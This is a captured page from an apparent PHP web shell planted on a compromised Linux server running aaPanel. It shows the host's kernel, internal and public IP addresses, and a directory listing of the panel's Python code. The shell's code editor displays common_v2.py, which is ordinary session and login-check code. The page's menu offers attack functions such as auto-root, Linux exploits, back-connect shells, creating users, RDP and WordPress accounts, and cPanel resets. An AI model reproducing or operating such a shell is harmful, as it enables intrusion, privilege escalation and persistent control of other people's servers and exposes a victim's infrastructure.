Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.149.27.125
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
panel /
class_v2 /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
btdockerModelV2
[ DIR ]
drwxr-xr-x
crontabModelV2
[ DIR ]
drwxr-xr-x
databaseModelV2
[ DIR ]
drwxr-xr-x
firewallModelV2
[ DIR ]
drwxr-xr-x
logsModelV2
[ DIR ]
drwxr-xr-x
monitorModelV2
[ DIR ]
drwxr-xr-x
panelModelV2
[ DIR ]
drwxr-xr-x
power_mta
[ DIR ]
drwxr-xr-x
projectModelV2
[ DIR ]
drwxr-xr-x
safeModelV2
[ DIR ]
drwxr-xr-x
safe_warning_v2
[ DIR ]
drwxr-xr-x
ssl_domainModelV2
[ DIR ]
drwxr-xr-x
virtualModelV2
[ DIR ]
drwxr-xr-x
wp_toolkit
[ DIR ]
drwxr-xr-x
acme_v3.py
133.98
KB
-rw-r--r--
ajax_v2.py
95.41
KB
-rw-r--r--
apache_v2.py
17.28
KB
-rw-r--r--
backup_bak_v2.py
24.86
KB
-rw-r--r--
breaking_through.py
47.94
KB
-rw-r--r--
cloud_stora_upload_v2.py
19.27
KB
-rw-r--r--
common_v2.py
12.45
KB
-rw-r--r--
config_v2.py
165.36
KB
-rw-r--r--
crontab_ssl_v2.py
1.85
KB
-rw-r--r--
crontab_v2.py
111.93
KB
-rw-r--r--
data_v2.py
36.54
KB
-rw-r--r--
database_v2.py
125.54
KB
-rw-r--r--
datatool_v2.py
5.83
KB
-rw-r--r--
db_mysql_v2.py
11.41
KB
-rw-r--r--
db_v2.py
11.04
KB
-rw-r--r--
dk_db.py
18.34
KB
-rw-r--r--
download_file_v2.py
2.54
KB
-rw-r--r--
fastcgi_client_two_v2.py
12.26
KB
-rw-r--r--
fastcgi_client_v2.py
6.89
KB
-rw-r--r--
file_execute_deny_v2.py
10.34
KB
-rw-r--r--
files_v2.py
149.12
KB
-rw-r--r--
firewall_new_v2.py
22.4
KB
-rw-r--r--
firewalld_v2.py
11.09
KB
-rw-r--r--
firewalls_v2.py
17.44
KB
-rw-r--r--
flask_compress_v2.py
5.12
KB
-rw-r--r--
flask_sockets_v2.py
3.75
KB
-rw-r--r--
ftp_log_v2.py
21.72
KB
-rw-r--r--
ftp_v2.py
16.17
KB
-rw-r--r--
http_requests_v2.py
24.25
KB
-rw-r--r--
jobs_v2.py
36.98
KB
-rw-r--r--
letsencrypt_v2.py
12.85
KB
-rw-r--r--
log_analysis_v2.py
12.23
KB
-rw-r--r--
monitor_v2.py
13.53
KB
-rw-r--r--
one_key_wp_v2.py
75.79
KB
-rw-r--r--
panelControllerV2.py
4.97
KB
-rw-r--r--
panelDatabaseControllerV2.py
5.76
KB
-rw-r--r--
panelDockerControllerV2.py
5.86
KB
-rw-r--r--
panelFireControllerV2.py
4.65
KB
-rw-r--r--
panelModControllerV2.py
5.13
KB
-rw-r--r--
panelProjectControllerV2.py
6.07
KB
-rw-r--r--
panelSafeControllerV2.py
4.65
KB
-rw-r--r--
panel_api_v2.py
10.43
KB
-rw-r--r--
panel_auth_v2.py
33.21
KB
-rw-r--r--
panel_backup_v2.py
102.56
KB
-rw-r--r--
panel_dns_api_v2.py
22.2
KB
-rw-r--r--
panel_http_proxy_v2.py
11.33
KB
-rw-r--r--
panel_lets_v2.py
43.61
KB
-rw-r--r--
panel_mssql_v2.py
4.48
KB
-rw-r--r--
panel_mysql_v2.py
7.55
KB
-rw-r--r--
panel_php_v2.py
24.78
KB
-rw-r--r--
panel_ping_v2.py
2.88
KB
-rw-r--r--
panel_plugin_v2.py
125.11
KB
-rw-r--r--
panel_push_v2.py
23.78
KB
-rw-r--r--
panel_redirect_v2.py
34.02
KB
-rw-r--r--
panel_restore_v2.py
11.04
KB
-rw-r--r--
panel_site_v2.py
343.73
KB
-rw-r--r--
panel_ssl_v2.py
75.34
KB
-rw-r--r--
panel_task_v2.py
28.7
KB
-rw-r--r--
panel_video_V2.py
1.88
KB
-rw-r--r--
panel_warning_v2.py
68.71
KB
-rw-r--r--
password_v2.py
8.09
KB
-rw-r--r--
plugin_auth_v2.py
3.14
KB
-rw-r--r--
plugin_deployment_v2.py
28.85
KB
-rw-r--r--
san_baseline_v2.py
51.13
KB
-rw-r--r--
site_dir_auth_v2.py
17.67
KB
-rw-r--r--
ssh_security_v2.py
45.66
KB
-rw-r--r--
ssh_terminal_v2.py
58.86
KB
-rw-r--r--
system_v2.py
44.77
KB
-rw-r--r--
userRegister_v2.py
6.74
KB
-rw-r--r--
user_login_v2.py
21.2
KB
-rw-r--r--
vilidate_v2.py
4.94
KB
-rw-r--r--
wxapp_v2.py
5.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : common_v2.py
#coding: utf-8 # +------------------------------------------------------------------- # | aaPanel # +------------------------------------------------------------------- # | Copyright (c) 2015-2099 aaPanel(www.aapanel.com) All rights reserved. # +------------------------------------------------------------------- # | Author: hwliang <hwl@aapanel.com> # +------------------------------------------------------------------- from BTPanel import session, cache , request, redirect, g,abort from datetime import datetime from public import dict_obj import os import public import json import sys import time class panelSetup: def init(self): panel_path = public.get_panel_path() if os.getcwd() != panel_path: os.chdir(panel_path) g.ua = request.headers.get('User-Agent','') if g.ua: ua = g.ua.lower() if ua.find('spider') != -1 or g.ua.find('bot') != -1: return abort(403) g.version = '6.8.36' g.title = public.GetConfigValue('title') g.uri = request.path g.debug = os.path.exists('data/debug.pl') g.pyversion = sys.version_info[0] session['version'] = g.version if not public.get_improvement(): session['is_flush_soft_list'] = 1 if request.method == 'GET': if not g.debug: g.cdn_url = public.get_cdn_url() if not g.cdn_url: g.cdn_url = '/static' else: g.cdn_url = '//' + g.cdn_url + '/' + g.version else: g.cdn_url = '/static' session['title'] = g.title g.recycle_bin_open = 0 if os.path.exists("data/recycle_bin.pl"): g.recycle_bin_open = 1 g.recycle_bin_db_open = 0 if os.path.exists("data/recycle_bin_db.pl"): g.recycle_bin_db_open = 1 g.is_aes = False self.other_import() return None def other_import(self): g.o = public.readFile('data/o.pl') g.other_css = [] g.other_js = [] if g.o: s_path = 'BTPanel/static/other/{}' css_name = "css/{}.css".format(g.o) css_file = s_path.format(css_name) if os.path.exists(css_file): g.other_css.append('/static/other/{}'.format(css_name)) js_name = "js/{}.js".format(g.o) js_file = s_path.format(js_name) if os.path.exists(js_file): g.other_js.append('/static/other/{}'.format(js_name)) class panelAdmin(panelSetup): setupPath = '/www/server' # 本地请求 def local(self): result = panelSetup().init() if result: return result result = self.check_login() if result: return result result = self.setSession() if result: return result result = self.checkClose() if result: return result result = self.checkWebType() if result: return result result = self.checkConfig() self.GetOS() # 设置基础Session def setSession(self): if request.method == 'GET': g.menus = public.get_menus_for_session_router() g.yaer = datetime.now().year session["top_tips"] = public.lang("The current IE browser version is too low to display some features, please use another browser. Or if you use a browser developed by a Chinese company, please switch to Extreme Mode!") session["bt_help"] = public.lang("For Support|Suggestions, please visit the aaPanel Forum") session["download"] = public.lang("Downloading:") if not 'brand' in session: session['brand'] = public.GetConfigValue('brand') session['product'] = public.GetConfigValue('product') session['rootPath'] = '/www' session['download_url'] = 'https://node.aapanel.com' session['setupPath'] = session['rootPath'] + '/server' session['logsPath'] = '/www/wwwlogs' session['yaer'] = datetime.now().year if not 'menu' in session: session['menu'] = public.GetLan('menu') if not 'lan' in session: session['lan'] = public.GetLanguage() if not 'home' in session: session['home'] = public.OfficialApiBase() return False # 检查Web服务器类型 def checkWebType(self): #if request.method == 'GET': if not 'webserver' in session: if os.path.exists('/usr/local/lsws/bin/lswsctrl'): session['webserver'] = 'openlitespeed' elif os.path.exists(self.setupPath + '/apache/bin/apachectl'): session['webserver'] = 'apache' else: session['webserver'] = 'nginx' if not 'webversion' in session: if os.path.exists(self.setupPath+'/'+session['webserver']+'/version.pl'): session['webversion'] = public.ReadFile(self.setupPath+'/'+session['webserver']+'/version.pl').strip() if not 'phpmyadminDir' in session: filename = self.setupPath+'/data/phpmyadminDirName.pl' if os.path.exists(filename): session['phpmyadminDir'] = public.ReadFile(filename).strip() return False # 检查面板是否关闭 def checkClose(self): if os.path.exists('data/close.pl'): return redirect('/close') # 检查登录 def check_login(self): try: api_check = True g.api_request = False if not 'login' in session: api_check = self.get_sk() if api_check: if not isinstance(api_check,dict): if public.get_admin_path() == '/login': return redirect('/login?err=1') return api_check g.api_request = True else: if session['login'] == False: session.clear() return redirect(public.get_admin_path()) if 'tmp_login_expire' in session: s_file = 'data/session/{}'.format(session['tmp_login_id']) if session['tmp_login_expire'] < time.time(): session.clear() if os.path.exists(s_file): os.remove(s_file) return redirect(public.get_admin_path()) if not os.path.exists(s_file): session.clear() return redirect(public.get_admin_path()) if not public.check_client_hash(): session.clear() return redirect(public.get_admin_path()) if api_check: now_time = time.time() session_timeout = session.get('session_timeout',0) if session_timeout < now_time and session_timeout != 0: session.clear() return redirect(public.get_admin_path()) login_token = session.get('login_token','') if login_token: if login_token != public.get_login_token_auth(): session.clear() return redirect(public.get_admin_path()) # if api_check: # filename = 'data/sess_files/' + public.get_sess_key() # if not os.path.exists(filename): # session.clear() # return redirect(public.get_admin_path()) # 标记新的会话过期时间 # session['session_timeout'] = time.time() + public.get_session_timeout() # 标记新的会话过期时间 self.check_session() except: # public.print_log(public.get_error_info()) session.clear() public.print_error() return redirect('/login?id=2') def check_session(self): white_list = ['/favicon.ico', '/system?action=GetNetWork'] if g.uri in white_list: return session['session_timeout'] = time.time() + public.get_session_timeout() # 获取sk def get_sk(self): save_path = '/www/server/panel/config/api.json' if not os.path.exists(save_path): return public.redirect_to_login() try: api_config = json.loads(public.ReadFile(save_path)) except: os.remove(save_path) return public.redirect_to_login() if not api_config['open']: return public.redirect_to_login() from BTPanel import get_input get = get_input() client_ip = public.GetClientIp() if not 'client_bind_token' in get: if not 'request_token' in get or not 'request_time' in get: return public.redirect_to_login() num_key = client_ip + '_api' if not public.get_error_num(num_key, 20): return public.returnJson(False,'20 consecutive verification failures, prohibited for 1 hour') if not public.is_api_limit_ip(api_config['limit_addr'], client_ip): # client_ip in api_config['limit_addr']: public.set_error_num(num_key) return public.returnJson(False,'%s[' % public.lang("20 consecutive verification failures, prohibited for 1 hour")+client_ip+']') else: num_key = client_ip + '_app' if not public.get_error_num(num_key,20): return public.returnJson(False,'20 consecutive verification failures, prohibited for 1 hour') a_file = '/dev/shm/' + get.client_bind_token if not public.path_safe_check(get.client_bind_token): public.set_error_num(num_key) return public.returnJson(False, 'illegal request') if not os.path.exists(a_file): import panelApi if not panelApi.panelApi().get_app_find(get.client_bind_token): public.set_error_num(num_key) return public.returnJson(False,'Unbound device') public.writeFile(a_file,'') if not 'key' in api_config: public.set_error_num(num_key) return public.returnJson(False, 'Key verification failed') if not 'form_data' in get: public.set_error_num(num_key) return public.returnJson(False, 'No form_data data found') g.form_data = json.loads(public.aes_decrypt(get.form_data, api_config['key'])) get = get_input() if not 'request_token' in get or not 'request_time' in get: return public.error_not_login('/login') g.is_aes = True g.aes_key = api_config['key'] request_token = public.md5(get.request_time + api_config['token']) if get.request_token == request_token: public.set_error_num(num_key,True) return False public.set_error_num(num_key) return public.returnJson(False,'Secret key verification failed') # 检查系统配置 def checkConfig(self): if not 'config' in session: session['config'] = public.M('config').where("id=?", ('1',)).field( 'webserver,sites_path,backup_path,status,mysql_root').find() if not 'email' in session['config']: session['config']['email'] = public.M( 'users').where("id=?", ('1',)).getField('email') if not 'address' in session: session['address'] = public.GetLocalIp() return False # 获取操作系统类型 def GetOS(self): if not 'server_os' in session: tmp = {} issue_file = '/etc/issue' redhat_release = '/etc/redhat-release' if os.path.exists(redhat_release): tmp['x'] = 'RHEL' tmp['osname'] = self.get_osname(redhat_release) elif os.path.exists('/usr/bin/yum'): tmp['x'] = 'RHEL' tmp['osname'] = self.get_osname(issue_file) elif os.path.exists(issue_file): tmp['x'] = 'Debian' tmp['osname'] = self.get_osname(issue_file) session['server_os'] = tmp return False def get_osname(self,i_file): ''' @name 从指定文件中获取系统名称 @author hwliang<2021-04-07> @param i_file<string> 指定文件全路径 @return string ''' if not os.path.exists(i_file): return '' issue_str = public.ReadFile(i_file).strip() if issue_str: return issue_str.split()[0] return ''
Close
